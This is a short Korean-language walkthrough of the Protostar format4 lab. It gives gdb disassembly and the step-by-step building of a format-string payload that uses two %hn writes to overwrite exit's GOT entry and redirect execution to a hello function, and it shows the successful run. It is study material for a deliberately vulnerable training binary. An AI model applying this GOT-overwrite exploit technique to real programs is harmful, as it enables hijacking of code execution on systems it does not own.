(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) disas hello
Dump of assembler code for function hello:
0x080484b4 <hello+0>: push ebp
0x080484b5 <hello+1>: mov ebp,esp
0x080484b7 <hello+3>: sub esp,0x18
0x080484ba <hello+6>: mov DWORD PTR [esp],0x80485f0
0x080484c1 <hello+13>: call 0x80483dc <puts@plt>
0x080484c6 <hello+18>: mov DWORD PTR [esp],0x1
0x080484cd <hello+25>: call 0x80483bc <_exit@plt>
End of assembler dump.
(gdb) x/s 0x80485f0
0x80485f0: "code execution redirected! you win"
(gdb)
hello 함수를 호출하라는것같네요.. 아마 vuln+49쪽의 함수를 바꿔치기하면 될 것 같슴다
일단 printf함수의 got는 0x804971c, hello는 0x80484b4
printf got 위치에 hello 주소를 덮어씌우면된다.
주소 덮어씌워야하니까 두개로 나눠보자 0x804971c에는 0x84b4를, 0x804971e에는 0x0804를 해서..
0x804971c => %33972d
0x804971e => %2052d
코드를 만들어보면 대략
"\x1e\x97\x04\x08" + "\x1c\x97\x04\x08" +
"%2044d"(앞에 8byte를 제함) +
"%4$hn"(인자번호 4 %hn은 %n의 절반임 2byte바꿀때 씀) +
"%31920d"(앞에 8byte랑 2044byte 제함) +
"%5$hn"(인자번호 5)
이런식으로 해서 해봤는데 안됨. printf라서 그런가 아무튼 exit로 got 바꿔서 시도해봄
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) x/10i 0x80483ec
0x80483ec <exit@plt>: jmp *0x8049724
user@protostar:/opt/protostar/bin$ python -c 'print "\x26\x97\x04\x08" +
"\x24\x97\x04\x08"+"%2044d"+"%4$hn"+"%31920d"+"%5$hn"' | ./format4
...중략...
-1208122336
code execution redirected! you win
ref.
$-flag : http://research.hackerschool.org/Datas/Research_Lecture/FSBv1.txt
https://www.exploit-db.com/docs/28476.pdf